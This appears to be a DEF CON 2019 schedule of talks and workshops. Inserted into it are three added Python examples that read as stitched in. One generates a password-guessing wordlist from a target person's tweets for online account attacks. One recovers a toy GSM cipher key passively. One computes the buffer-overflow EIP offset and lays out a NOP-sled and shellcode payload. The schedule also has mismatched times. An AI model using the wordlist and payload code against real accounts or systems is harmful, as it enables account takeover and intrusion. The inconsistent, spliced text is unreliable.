Defenders are often unsung heroes today. Blue teamers, like system admins, may find themselves writing code to glue things together, fill in the gaps between existing tools, or make up for lack of tools altogether. If your codebase evolves into a critical system, the work of managing its rising complexity can become a serious challenge. Defense is hard, and studying the esoterics of software architecture can be a rare luxury (or an exercise in frustration, depending on your situation). This workshop aims to hand you the distilled, demystified truth, sans the cryptic terminology. We will collectively build some code that illustrates the philosophy of the functional paradigm, and has a good chance of being useful in your work.

Why functional programming?

This is a paradigm from the days of Lisp and the original generation of MIT hackers. After decades of obscurity, it is moving into the mainstream because it answers two serious problems particularly well: rising code complexity, and the need to support parallelism. Any parts of it that you take away from this workshop are likely to improve your quality of life as a software engineer.

For this workshop, we will choose two programming languages to work with: one for comfort, and one for stretching. Python will be the comfort language, because of its widespread use in many fields. Haskell will be the stretch language, and no one is expected to try it if they're not comfortable. What we want is for you to get a sense of how the functional approach looks, not just in a mainstream language like Python, but also in a language built especially with the functional style in mind.

Skill Level Intermediate

Prerequisites: Some CS fundamentals are helpful, but anyone who has written code as part of their job should be able to walk away with something of value. We won't be using the arcane vocabulary associated with this field, except in the tiniest of amounts, until we begin to talk theory at the end. We don't do theory until everyone has had experience of success writing code based on the concepts.

Materials: A laptop that can last a good three hours on battery under a light/medium workload (or else the good fortune to sit near a power outlet). Your operating system of choice with your preferred text editor ready to go.

Max students: 35

Registration: https://www.eventbrite.com/e/functional-programming-for-the-blue-team-valley-of-fire-ii-tickets-63998222406
(Opens 8-Jul-19)

eigentourist
eigentourist is a programmer turned data scientist, with 20 years in application development, and three years in the world of big data and machine learning. He began formal education in computer science when the height of software engineering discipline meant avoiding the use of GOTO statements. Over the course of his career, he has created code of beautiful simplicity and elegance, and of horrific complexity and unpredictability. Sometimes, it's hard to tell which was which. Today, he works on predictive models and computing clusters in the health care industry.



PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 15:00-15:30


Generating Personalized Wordlists With NLP by Analyzing Tweets

Utku Sen, R&D Lead at Tear Security

Adversaries need a wordlist or a combination-generation tool when conducting password guessing attacks. To narrow the combination pool, researchers developed a method named "mask attack", where the attacker needs to assume a password's structure. Even if it narrows the combination pool significantly, it can still be too large to use for online attacks or for offline attacks with low hardware resources. The Rhodiola tool was developed to narrow the combination pool by creating a personalized wordlist for target people. It finds the interest areas of a given user by analyzing his/her tweets, and builds a personalized wordlist.
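The idea in working form, as an added example that is not Rhodiola's code: interest terms are picked from a target's tweets by frequency after stripping URLs, mentions and stopwords (a stand-in for the NLP step), then turned into candidates with the case, leet, year and symbol mutations people actually use. The TWEETS are constructed; the stopword list is a small hand-picked one.

```python
"""Added example: personalized wordlist from a target's tweets.
Not Rhodiola's code; a frequency heuristic stands in for the NLP step.
TWEETS is a constructed sample."""
import re
from collections import Counter
from itertools import permutations

STOPWORDS = {
    "the", "and", "for", "with", "that", "this", "you", "your", "are", "was",
    "not", "but", "have", "has", "from", "they", "them", "our", "out", "all",
    "just", "again", "ever", "down", "today", "tomorrow", "about", "into",
    "what", "when", "where", "will", "can", "can't", "get", "got",
}

TWEETS = [
    "Best weekend ever at Yosemite with Luna, my golden retriever!",
    "Luna stole my sandwich again. Dog life.",
    "Counting down to Yosemite in June. Hiking season! #yosemite",
    "New record on the trail today, 21km #trailrunning",
    "Luna turns 3 tomorrow, party at the park https://example.invalid/pic",
    "Can't wait for #trailrunning camp with @coach_sam and Luna",
]

TOKEN = re.compile(r"#?[A-Za-z][A-Za-z']+")
NOISE = re.compile(r"https?://\S+|@\w+")   # URLs and @mentions carry no interest signal
LEET = str.maketrans("aeios", "43105")


def extract_terms(tweets, top=5):
    """Most frequent non-stopword terms; hashtags count like ordinary words."""
    counts = Counter()
    for text in tweets:
        for tok in TOKEN.findall(NOISE.sub(" ", text)):
            word = tok.lstrip("#").lower()
            if len(word) >= 3 and word not in STOPWORDS:
                counts[word] += 1
    return [w for w, _ in counts.most_common(top)]


def mutate(term, years=range(2015, 2020), suffixes=("!", "1", "123")):
    """Common user habits: case changes, leet, then a year or symbol suffix."""
    bases = {term, term.capitalize(), term.upper(), term.translate(LEET)}
    out = set(bases)
    for b in bases:
        for s in list(suffixes) + [str(y) for y in years]:
            out.add(b + s)
    return out


def build_wordlist(tweets, top=5):
    """Mutations of each interest term plus two-term concatenations."""
    terms = extract_terms(tweets, top)
    words = set()
    for t in terms:
        words |= mutate(t)
    for a, b in permutations(terms, 2):
        words.add(a + b)
        words.add(a.capitalize() + b.capitalize())
    return sorted(words)


if __name__ == "__main__":
    for w in build_wordlist(TWEETS, top=3):
        print(w)
```

The output is small enough for an online attack against a single account, which is the point of narrowing the pool; against a hash dump you would feed the same terms into a mask attack rather than stop at these mutations.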

Utku Sen (Twitter: @utkusen) is a security researcher mostly focused on application security, network security and tool development. He has presented his tools and research at Black Hat USA Arsenal, DEF CON Demo Labs and the Packet Hacking Village in recent years. He was also nominated for a Pwnie Award in the "Best Backdoor" category in 2016. He is currently working for Tear Security.



DC - Paris - Track 1 - Saturday - 15:00-15:45


Get off the Kernel if you can’t Drive

Saturday at 15:00 in Track 1
45 minutes | Demo, Tool, Exploit

Jesse Michael

Mickey Shkatov

For software to communicate with hardware, it needs to talk to a kernel-mode driver that serves as a middle-man between the two, helping to make sure everything operates as it should. In Windows that is done using the Kernel-Mode Driver Framework (KMDF).

These drivers are used to control everything in your computer, from small things like CPU fan speed, color of your motherboard LED lights, up to flashing a new BIOS.

However, as the code in these drivers runs with the same privileges as the rest of the kernel, malicious drivers can be used to compromise the security of the platform. To that end, Microsoft relies on WHQL, code signing, and EV Signing to prevent drivers which have not been approved by Microsoft from being loaded into the kernel.

Unfortunately, security vulnerabilities in signed drivers can be used as a proxy to read and write hardware resources such as kernel memory, internal CPU configuration registers, PCI devices, and more. These helpful driver capabilities can even be misused to bypass and disable Windows protection mechanisms.

Let us teach you how these drivers work, show you the unbelievable risk they pose, and enjoy our walk of shame as we parade all the silly and irresponsible things we discovered in our research.

Jesse Michael
Jesse Michael is an experienced security researcher focused on vulnerability detection and mitigation who has worked at all layers of modern computing environments from exploiting worldwide corporate network infrastructure down to hunting vulnerabilities inside processors at the hardware design level. His primary areas of expertise include reverse engineering embedded firmware and exploit development. He has also presented research at DEF CON, Black Hat, PacSec, Hackito Ergo Sum, Ekoparty, and BSides Portland.

Twitter: @JesseMichael

Mickey Shkatov
Mickey Shkatov, a principal researcher at Eclypsium, has been performing security research and product security validation since 2010. He has also presented multiple times at DEF CON, Black Hat, PacSec, CanSecWest, BruCon, Hackito Ergo Sum, and BSides Portland.

Twitter: @HackingThings



BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 18:15-18:59


6:15 PM: Getting access to your heart's data
Speaker: Marie Moe

Abstract: Marie's pacemaker was hit by cosmic radiation while she was flying, which caused bit flips in the memory of the device. The incident led to her getting hold of an encrypted file with a crash log and a memory dump from her device. In order to get access to her own heart's data, she handed this file over to the two master's students she was supervising at the time and gave them the task of breaking the crypto. They succeeded in finding the hard-coded key, which will be demonstrated in this talk.

Speaker Bio: Dr. Marie Moe has a PhD in information security and works as a Research Manager at SINTEF and an Associate Prof. at NTNU. She is currently doing research on the security of her own implanted pacemaker. Marie loves to break crypto protocols, but gets angry when the broken crypto is in her own body.

T: @MarieGMoe


SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 16:30-16:59


Getting Psychic: Cold Reading Techniques for Fortune Tellers and Social Engineers

No description available



DC - Paris - Track 3 - Saturday - 16:30-16:50


Go NULL Yourself or: How I Learned to Start Worrying While Getting Fined for Other’s Auto Infractions

Saturday at 16:30 in Track 3
20 minutes

droogie Security Consultant at IOActive

Input sanitization issues will always exist, although it’s surprising how we’re still seeing amateur mistakes being made in everyday applications and systems used by millions. After making some observations against automatic license plate recognition (ALPR) data requested via the Freedom of Information Act (FOIA), while having reminiscent conversations about old hacker tales, it turned on the evil bit, leading to some interesting ideas. We’ll go over this adventure of poking at systems using totally valid user-controlled data that causes unexpected behavior in the real world. It’s always a strange thing when you can “exploit” unexpected attack surface due to poor specification, especially in government systems.

droogie
droogie is a security researcher interested in offensive security and hacking of retro and modern video games alike. He makes a living as a security consultant at IOActive, which helps fund his degenerate passion for hardware hacking on old video game console hardware. He’s spoken at conferences like CCC and Ruxcon and helped bring Metal Gear Online back to life, and he enjoys international travel to security conferences to kick it with awesome hackers.



DL - Planet Hollywood - Sunset 5 - Saturday - 10:00 - 11:50


Go Reverse Engineering Tool Kit

Saturday from 10:00 – 11:50 in Sunset 5 at Planet Hollywood
Audience: Defense

Joakim Kennedy

The Go Reverse Engineering Tool Kit (go-re.tk) is a new open-source toolset for analyzing Go binaries. The tool is designed to extract as much metadata as possible from stripped binaries to assist in both reverse engineering and malware analysis. For example, GoRE can detect the compiler version used, extract type information, and recover function information, including source code line numbers for functions and source tree structure. The core library is written in Go, but the tool kit includes C-bindings and a library implementation in Python. When using the C-bindings or the Python library, it is possible to write plugins for other analysis tools such as IDA Pro and Ghidra. The toolset also includes “redress”, which is a command line tool to “dress” stripped Go binaries. It can both be used standalone to print out extracted information from the binary or as a radare2 plugin to reconstruct stripped symbols and type information. The tool kit consists of:

* Core library written in Go
* C-bindings
* Python library using the C-bindings
* A command line tool for easy analysis

https://github.com/goretk

Joakim Kennedy
Joakim Kennedy is the Threat Intel Manager for Anomali Research. His job involves playing with malware, tracking threat actors and everything else around threat intelligence.



Night Life - Planet Hollywood - Gallery Club - Saturday - 22:00-25:59


Title:
GothCON party

Back for our second year, and this time powered with the blessings of the Def Con 'call for parties' space - we're hosting an official gothcon party open to all defcon attendees in the gorgeous Gallery Bar in Planet Hollywood on Saturday August 10th.
Twitter Follow at @dcgothcon
search Twitter: #gothcon


DC - Paris - Track 2 - Saturday - 13:00-13:45


GSM: We Can Hear Everyone Now!

Saturday at 13:00 in Track 2
45 minutes | Demo, Exploit

Campbell Murray Global Head Cybersecurity Delivery, BlackBerry

Eoin Buckley Senior Cybersecurity Consultant

James Kulikowski Senior Cybersecurity Consultant

The presentation demonstrates that the A5/1 and A5/3 ciphers used to protect cellular calls are vulnerable to compromise, leading to full decryption of GSM communications, using freely available open source solutions along with tools we developed for this task.

The flaw being exploited lies in the heart of the design of GSM. In all implementations the standard requires GSM messages to first be error control encoded using a convolutional code and then encrypted. In the vast majority of implementations used today, encryption is performed using the A5/1 or A5/3 cipher. The convolutional code adds redundancy to the transmitted message, which can act like a fingerprint to identify the key used to encrypt the GSM message.

To exploit the vulnerability an attacker simply needs to capture a transmission and identify the GSM channel used. The standard defines the convolutional code and therefore how the redundancy may be interpreted to recover the encryption key.

This presentation considers passively capturing GSM traffic using A5/3 encryption and demonstrates a novel solution to cracking the key used without interacting with the mobile or network.
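The key-fingerprint idea carried through in code, as an added example that is not the speakers' tooling. The encoder and syndrome check use the rate-1/2, constraint-length-5 code from the GSM channel-coding specification (3GPP TS 45.003), G0 = 1 + D^3 + D^4 and G1 = 1 + D + D^3 + D^4. Because both output branches are the same information polynomial multiplied by G0 and G1, every valid codeword satisfies c0·G1 + c1·G0 = 0 over GF(2), so a candidate keystream that does not turn the captured bits back into something passing that check can be discarded without ever touching the phone or the network. The cipher here is a deliberately tiny 12-bit LFSR stand-in so the whole key space can be exhausted in well under a second; it is not A5/1 or A5/3, and the message bits and key are constructed.

```python
"""Added example: why pre-encryption convolutional coding fingerprints the key.

Code: GSM rate-1/2 code (3GPP TS 45.003), G0 = 1+D^3+D^4, G1 = 1+D+D^3+D^4.
Cipher: a 12-bit LFSR toy stand-in, NOT A5/1 or A5/3. MESSAGE/TRUE_KEY constructed.
"""

G0 = 0b11001   # bit i holds the coefficient of D^i: 1 + D^3 + D^4
G1 = 0b11011   # 1 + D + D^3 + D^4
TAIL = 4       # encoder memory; GSM appends 4 zero tail bits to flush it
KEY_BITS = 12  # toy key size so brute force finishes instantly


def gf2_mul(a, b):
    """Carry-less multiplication of GF(2)[D] polynomials packed in ints."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        b >>= 1
    return r


def encode(info_bits):
    """Rate-1/2 encode and interleave: output bit 2i is branch 0, bit 2i+1
    is branch 1. Returns (codeword, length_in_bits)."""
    u = sum(bit << i for i, bit in enumerate(info_bits))
    n = len(info_bits) + TAIL                      # per-branch length with tail
    c0, c1 = gf2_mul(u, G0), gf2_mul(u, G1)
    cw = 0
    for i in range(n):
        cw |= ((c0 >> i) & 1) << (2 * i) | ((c1 >> i) & 1) << (2 * i + 1)
    return cw, 2 * n


def syndrome(codeword, length):
    """Zero for every valid codeword: c0*G1 + c1*G0 = u*G0*G1 + u*G1*G0 = 0.
    Bits decrypted with the wrong keystream fail this with overwhelming odds."""
    c0 = c1 = 0
    for i in range(length // 2):
        c0 |= ((codeword >> (2 * i)) & 1) << i
        c1 |= ((codeword >> (2 * i + 1)) & 1) << i
    return gf2_mul(c0, G1) ^ gf2_mul(c1, G0)


def toy_keystream(key, nbits):
    """12-bit Fibonacci LFSR (x^12 + x^11 + x^10 + x^4 + 1). Toy stand-in only."""
    state = key & ((1 << KEY_BITS) - 1)
    ks = 0
    for i in range(nbits):
        ks |= (state & 1) << i
        fb = (state ^ (state >> 1) ^ (state >> 2) ^ (state >> 8)) & 1
        state = (state >> 1) | (fb << (KEY_BITS - 1))
    return ks


def encrypt(codeword, length, key):
    """Stream-cipher the coded bits, as GSM does after channel coding."""
    return codeword ^ toy_keystream(key, length)


def recover_key(ciphertext, length):
    """Passive attack: keep only keys whose keystream turns the captured burst
    back into something the encoder could have produced."""
    return [k for k in range(1, 1 << KEY_BITS)
            if syndrome(ciphertext ^ toy_keystream(k, length), length) == 0]


MESSAGE = [int(b) for b in "110100101011100011010011"]   # 24 constructed info bits
TRUE_KEY = 0xABC                                         # constructed

if __name__ == "__main__":
    cw, n = encode(MESSAGE)
    ct = encrypt(cw, n, TRUE_KEY)
    print("syndrome(codeword)   =", syndrome(cw, n))
    print("syndrome(ciphertext) =", syndrome(ct, n))
    print("keys consistent with capture:", [hex(k) for k in recover_key(ct, n)])
```

With 24 information bits the 56-bit burst carries 32 parity constraints, far more than the 12 bits of toy key, so exactly one key survives; a real cipher has a key space that cannot be enumerated this way, which is where the speakers' cracking method comes in, but the consistency check that tells a right candidate from a wrong one is the same.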

Campbell Murray
Campbell Murray is the global head of BlackBerry Cybersecurity Delivery and joined the organization through the acquisition of Encription Ltd, of which he was a founder and director. He has over 20 years’ cybersecurity experience with an emphasis on offensive security techniques and security engineering in the IoT, industrial and transport arenas. Campbell is a founding director of both the TigerScheme and the CyberScheme.

Twitter: @zyx2k

Eoin Buckley
Michael Eoin Buckley is a senior cybersecurity consultant at BlackBerry with over 20 years’ experience spanning cybersecurity consultancy, product security and both security and physical layer aspects of 3GPP cellular, Zigbee and IETF standards. In his role he leads the cybersecurity engineering effort and specializes in product security assessments of several areas such as automotive, healthcare and aerospace. Eoin holds a Ph.D. from Cornell University with a thesis focus on error control coding.

James Kulikowski
James Kulikowski is a senior cybersecurity consultant at Blackberry and an active member at Unallocated Space in Baltimore Maryland. In his 15 years, James has worked with clients from the DoD and Intel community to companies in finance, healthcare and transportation. James previously specialized in risk management and policy development before transitioning to hardware and software security assessments.



Night Life - Planet Hollywood - Mezzanine Stage - Saturday - 18:00-18:59


Title:
H@ck3r Runw@y

No description available

ICS - Bally's Event Center - Saturday - 12:00-12:30


Hack the World & Galaxy with OSINT

August 10, 2019 12:00 PM

Come on a journey of discovering vulnerable and exploitable IT, IoT/IIoT and ICS/SCADA systems and assets connected to the internet: from smart home appliances, databases, burglar alarms, hydroelectric dams, fire alarms, airports and aviation, public transport, maritime, satellites, the North American OpenADR electric grid, renewable energy and more. Nothing is safe, not even in space.

Speaker Information

Panelist Information

Chris Kubecka

HypaSec

HypaSec CEO; previously headed the Information Protection Group and the network/security operations and joint international intelligence team for Aramco; established security teams and security contracts; EU/UK privacy; USAF Space Command; recovery after the Shamoon cyberwar attacks; author of Hack the World with OSINT.



Workshops - ( Sold Out ) - Flamingo - Lower Level - Valley of Fire I - Saturday - 14:30-18:30


Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows.

Saturday, 1430-1830 in Flamingo, Valley of Fire I

Dino Covotsos Founder & CEO, Telspace Systems

Want to learn about exploit development but feeling overwhelmed at all the latest technologies and buzzwords?

Hack to Basics is a course which will provide you with foundational-level exploit development skills with real-world exploitation techniques. This will range from "vanilla" EIP overwrites through Structured Exception Handler (SEH) exploitation and how egg hunters work, with practical examples.

By the end of the course, students can expect to know the basics of x86 assembly, including some real-world examples of exploiting vanilla EIP overwrites, SEH exploitation and using egg hunters. This will provide an entry to the world of exploit development and a strong foundation to work from, making it easier to transition to the newer, more advanced technologies which are in place today.
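As an added example (not workshop material): the cyclic-pattern technique the Corelan and FuzzySecurity tutorials linked below use to find the EIP offset in a vanilla overwrite, followed by the classic payload layout that offset feeds into. The crash value and return address are constructed placeholders, not taken from any real target.

```python
"""Added example: find the EIP offset with a cyclic pattern, then lay out a
vanilla x86 stack-overflow payload. Crash value and return address are
constructed placeholders."""
import string
import struct


def pattern_create(length):
    """Metasploit-style pattern Aa0Aa1...Aa9Ab0...: every 4-byte window is
    unique for the first 20280 bytes, so a register value maps to one offset."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_value, length=20280):
    """Offset in the buffer of the 4 bytes that landed in EIP. Accepts the
    register value as an int (x86 is little-endian, so the bytes are reversed)
    or the 4-character string shown in the debugger. -1 if not found."""
    if isinstance(eip_value, int):
        needle = struct.pack("<I", eip_value).decode("ascii", "replace")
    else:
        needle = eip_value
    return pattern_create(length).find(needle)


def build_overflow(offset, ret_addr, shellcode, nop_sled=16, total=None):
    """Classic layout: junk up to EIP, return address packed little-endian,
    NOP sled, shellcode, optional padding to the original crash length.
    `ret_addr` would be a JMP ESP in a module without ASLR/rebase."""
    payload = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode
    if total is not None and len(payload) < total:
        payload += b"C" * (total - len(payload))
    return payload


if __name__ == "__main__":
    crash_eip = 0x41386141          # value seen in EIP after sending the pattern (constructed)
    print("pattern start :", pattern_create(24))
    print("EIP offset    :", pattern_offset(crash_eip))
    print("payload bytes :", len(build_overflow(pattern_offset(crash_eip), 0xDEADBEEF, b"\xcc" * 4, total=100)))
```

Send `pattern_create(n)` in place of the A's, read EIP from Immunity, and `pattern_offset` gives the exact number of junk bytes; if it returns -1, the value in EIP did not come from your buffer and you are looking at a different corruption.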

To get the most out of this training, the following should be studied beforehand:

FuzzySecurity:

http://www.fuzzysecurity.com/tutorials/expDev/1.html
http://www.fuzzysecurity.com/tutorials/expDev/2.html
http://www.fuzzysecurity.com/tutorials/expDev/3.html
http://www.fuzzysecurity.com/tutorials/expDev/4.html

Corelan:

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

We will be using Python to construct our exploits, combined with a debugger such as Immunity or OllyDbg, so it is recommended to be familiar with both.

Skill Level Intermediate/Advanced

Prerequisites: Basic experience in assembly and a debugger, preferably Immunity or Olly.
2-3 years of penetration testing experience would be beneficial.
Experience in Kali linux, as this will be used as the primary operating system.

Materials: Laptops with the following specs or greater:

Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz (or AMD equivalent)
8GB RAM
Kali Linux installed (x86 is fine)
Wireless Network Adapter + Ethernet Adapter
Virtualbox or equivalent installed

Max students: 35

Registration: https://www.eventbrite.com/e/hack-to-basics-x86-windows-based-buffer-overflows-an-introduction-to-buffer-overflows-valley-of-tickets-63998523306
(Opens 8-Jul-19)

Dino Covotsos
Dino Covotsos is the founder and CEO of Telspace Systems. With over 20 years of experience, he leads the research and technical team at Telspace. Covotsos has many years of experience in the information security sector and has been involved in hundreds of information security projects worldwide. He is also a well-known presenter at international conferences, including Hack In the Box, Sector, H2HC, DEF CON and many more. Covotsos is also passionate about the information security community and is involved in various community-based projects. Covotsos has several industry certifications, such as the OSCE, OSCP, OSWP and CREST CRT.



RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 10:00-10:50


COMPREHENSIVE TALK

Hack to Basics – Adapting Exploit Frameworks to Evade Microsoft ATP

1000 - 1050

Anthony “C01И” Rose and Jake “Hubble” Krasnov



Meetups - Planet Hollywood - London Club - Saturday - 19:30-25:59


Title:
Hacker Flairgrounds

Flaming badge builder or just badge curious, Hacker Flairgrounds is the ultimate gathering of hackers and blinking LEDs in Vegas.

This is the Meetup destination for badge collectors, designers, and prototypers that you have been waiting for! A social environment to show off your custom badges, discuss projects to make your own badges and talk to collectors who cherish your work. Flashing LEDs, crafting time, trading, and the celebration of badge craft all in one.


Night Life - Planet Hollywood - Mezzanine Stage - Saturday - 20:00-21:59


Title:
Hacker Jeopardy

No description available

Night Life - Paris - Concorde C Ballroom - Saturday - 19:30-25:59


Title:
Hacker Karaoke

Two great things that go great together! Join the fun as your fellow hackers make their way through songs from every era and style. Everyone has a voice and this is your opportunity to show it off! Quickly becoming a DEF CON tradition and a favorite of people from all skill levels.


PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 10:00-10:59


Hacking Corporate Org Socialization: One Day You Are Out and the Next Day You Pwn the Org!

D9, Independent Researcher

There is a growing community of hackers who refer to themselves as "Chameleon Hackers" and practice an organizational socialization technique they call "code switching." Code switching is a "tradecraft" practice used by chameleon hackers to consciously change their mannerisms, outward appearance, dress, thinking, physical characteristics, and language in order to achieve socialization in either a virtual or live setting. The briefer will draw on his December 2018 doctoral dissertation to describe a framework for how these chameleon hackers go about their code-switching tradecraft and then discuss examples of how they "hacked" the hacker community and the corporate C-suite.

D9 (Twitter: @D9_Pilot) is a member of the Senior Executive Service and currently serving as the Deputy Director for Expeditionary Warfare for the U.S. Navy. Twenty-six years as a U.S. Air Force officer, serving as a B-52H navigator and then F-15A and A-37B pilot. Held Command, Director, and staff positions across the Air Force in training operations, policy, and advanced training technologies. Three operational deployments, with the last in Pakistan in support of Operation Enduring Freedom (Afghanistan). Served in the Office of the Secretary of Defense for eleven years as the DoD Senior Executive responsible for the programming and execution of the nearly $900M/year the Department of Defense invests in worldwide joint training and training technologies. Cyber experience includes: Co-Lead with the DoD CIO to develop the strategy and implement the Secretary of Defense's DoD Cyber Strategy to "Build and Maintain Ready Forces to Conduct Cyberspace Operations." Built from scratch a six-month Cyber Operations training course that yielded a 78% cohort pass rate (average is 16%) on the Offensive Security Certified Professional certification. Worked with DEF CON officials to repurpose DEF CON's CTF and CTP technical architecture to support DoD's cyber operations training. 2018 Doctorate in Education from The University of Pennsylvania's Graduate School of Education. Dissertation advanced organizational socialization theory by improving our understanding of the plasticity of human socialization. Study population consisted of "chameleon" hackers who practiced a socialization tradecraft technique they called "Code Switching."



CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 12:15-12:59


Speaker: Rotem Bar

Twitter: @rotembar

Abstract: In this talk I will share my experience about how I hacked different automotive clouds, techniques I used and goals I pursue after connecting.

In this talk I will give real life examples of:

  • From zero to hero – Full backend control with examples
  • Common fails which allow me to jump between networks
  • Dangers of connected cars - Taking over a car from the cloud
  • How to break a production line
  • Cloud credentials leakage

I will talk about the main connectivity areas I look for, supplier integrations, and the differences between normal clouds and automotive clouds. Once I get a good foothold: possible targets and places which can do the most harm, where I can jump next inside, and how deep the rabbit hole goes.

This will be a technical talk going into places I've experienced personally in the last few years, and will try to give a glimpse of the fun life of hacking into the vehicle ecosystem.

About Rotem: I have worked in the automotive field for about 4 years now. I started my way with red-teaming production plants and different cloud providers with the goal of getting as deep as possible and showing full impact. I love breaking stuff, especially when it's at mass scale: taking control over entire systems and seeing my clients in awe and shock as I give them live annotations of what I'm doing to them.



SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 17:05-17:35


Saturday August 10 2019 1705 30 mins
Hacking Your Career Through Social Engineering
Social engineering is a special form of hacking that bridges our technical skills with a deep understanding of human behavior. Many of us use this special blend of techniques to assist in our various colors of hacking, but even those of us not in a professional social engineering, hacking, or penetration testing role can use these skills to aid our career success. Social engineering has a wonderful set of techniques that can be used to help you enter into a new job or a new career, get a promotion, self-promote, overcome imposter syndrome, plus many other situations. This talk will walk through the ways we can apply our knowledge of social engineering to any job and any career to help us be successful.

Rebecca Long: @amaya30
Rebecca Long is a software engineer with 15 years' experience focusing on quality assurance and DevOps. She is currently working at RiskLens, a cyber-risk quantification software company in Spokane, Washington, as their Lead DevOps Engineer. She holds undergraduate and master's degrees in computer science, with her thesis on social engineering and phishing within a financial institution. As a leader in the Spokane tech community for most of the last decade, in 2018 she finally launched her dream of a non-profit called Future Ada, which supports and advocates for women and non-binary people in STEAM (science, technology, engineering, art, and mathematics).



DC - Paris - Track 3 - Saturday - 11:00-11:45


Hacking Your Thoughts - Batman Forever meets Black Mirror

Saturday at 11:00 in Track 3
45 minutes

Katherine Pratt/GattaKat, NSF Graduate Research Fellow, University of Washington - Seattle

Companies are coming for your brains. The electricity in your brains, to be more precise. Valve, Facebook, Elon Musk and more are funding research into technologies that will translate neural signals into controls for devices like computers, smartphones, and VR/AR environments. While this would be super exciting, it represents some serious data privacy issues. First: what kind of private information can be elicited from your neural signals? It’s possible to use a specific kind of neural response to visual and audio stimuli to deduce information about the user… like where you bank, who you know, your real identity, etc (Edward Nygma in Batman Forever, anyone?)

More broadly, there is also the issue of what happens when you provide your neural signals to a company. If you’re worried about what Facebook is doing with your information now, imagine what they can do when they have hours of information straight from your brain. If neural data is treated the same as your DNA, commercial companies become the owners of your thoughts (as electrical signals). Will they readily share it with the FBI without probable cause? These kinds of questions, and many more, are starting to surface with neurally-controlled devices and other emerging technologies. This talk will cover all of this and more.

Katherine Pratt/GattaKat
Dr Katherine Pratt received her B.S. in aerospace engineering from MIT in 2008, and her PhD in Electrical and Computer Engineering (ECE) from the University of Washington (UW) in 2019. During undergrad she completed several internships with the private space venture Blue Origin, working in systems and propulsion engineering. She served four years in the United States Air Force, working primarily as an operational flight test engineer on the F-35 Joint Strike Fighter. Her doctoral dissertation focused on the privacy, ethics, and policy of information derived from elicited neural signals. She was the recipient of a National Science Foundation Graduate Research Fellowship and the 2018-19 UW ECE Irene Peden Endowed Fellowship. During graduate school she interned with the ACLU of Washington through the Speech, Privacy, and Technology Project. She also completed a six-month fellowship as the first Congressional Innovation Scholar through TechCongress, where she crafted technology policy and legislation in the office of a member of the House of Representatives.

Twitter: @GattaKat
Website: https://kaipratt.site/web



DC - Paris - Track 2 - Saturday - 11:00-11:45


HAKC THE POLICE

Saturday at 11:00 in Track 2
45 minutes | Demo, Tool

Bill Swearingen, World’s #23 Best Hacker

PULL OVER!
No, it is a cardigan, but thanks for noticing! After getting a nasty speeding ticket, OG SecKC HA/KC/ER hevnsnt decided enough was enough, and set out to fully understand police speed measurement devices, and develop homebrew countermeasures that are legal in some states (and some that are not). Come learn how police RF (X, K, KA) and Laser speed detection systems work and how to implement your own homebrew jamming countermeasures on the cheap, essentially making your vehicle invisible to law enforcement. HOP IN and BUCKLE UP, this talk is going to FUEL your hardware hacking desires! You better be able to think fast to keep up with this talk and prepare to get home in record time.

Bill Swearingen
Bill Swearingen (hevnsnt) has been in the hacking scene for decades, which is odd because his Twitter profile says he is only 23 years old. Having spent his life dedicated to understanding how things work, he has focused this curiosity and knowledge to take advantage of our world in any way possible. His interests have always been focused on hardware hacking, and he loves releasing easy-to-replicate projects using cheap computing platforms such as Arduino and Raspberry Pi.

Twitter: @hevnsnt



Meetups - Planet Hollywood - Mezzanine Stage - Saturday - 15:00-16:59


Title:
Homebrew Hardware Contest

No description available

DC - Paris - Track 1 - Saturday - 12:00-12:45


How You Can Buy AT&T, T-Mobile, and Sprint Real-Time Location Data on the Black Market

Saturday at 12:00 in Track 1
45 minutes

Joseph Cox, Senior Staff Writer, Motherboard

Major US telecommunications companies AT&T, T-Mobile, and Sprint have been quietly selling access to their customers’ real-time location data, including cell tower information as well as highly precise GPS data. Through a complex network of dodgy data aggregators and middlemen companies, this data access eventually trickled down to a slew of different industries, used car salesmen, landlords, and hundreds of bounty hunters, likely without your knowledge or informed consent. In this talk, based on leaked documents, sources, and first-hand experience, Joseph will explain how this data industry works, the players involved, and also how the data access is available on the black market, where it can be used in any way an attacker fancies: Joseph paid a source $300 to successfully locate a phone in New York.

Joseph Cox
Joseph is an investigative reporter for Motherboard, the science and technology section of VICE. He covers cybersecurity, the digital underground, and social media platforms.

Twitter: @josephfcox



ICS - Bally's Event Center - Saturday - 13:00-13:30


HVACking: Understand the difference Between Security and Reality!

August 10, 2019 1:00 PM

This session and demo explore an ICS 0-day vulnerability found by McAfee. The target is a PLC manufactured by a major SCADA vendor. The device is popular in critical industries such as education, healthcare, hospitality, and manufacturing/industrial. Not only is this vulnerability remotely exploitable with no authentication required, but many of the devices can be compromised over the Internet.

Speaker Information

Panelist Information

Douglas McKee

McAfee

Douglas McKee is a Sr. Security Researcher for the McAfee ATR team, focused on finding new vulnerabilities in both software and hardware. Douglas has an extensive background in vulnerability research, penetration testing, reverse engineering, and forensics.



CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 15:00-14:59


I am Spartacus! (And You Can Be Too!) Ensuring Privacy through Obfuscation

No description available



SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 15:30-16:20


Saturday August 10 2019 1630 30 mins
Getting Psychic: Cold Reading Techniques for Fortune Tellers and Social Engineers
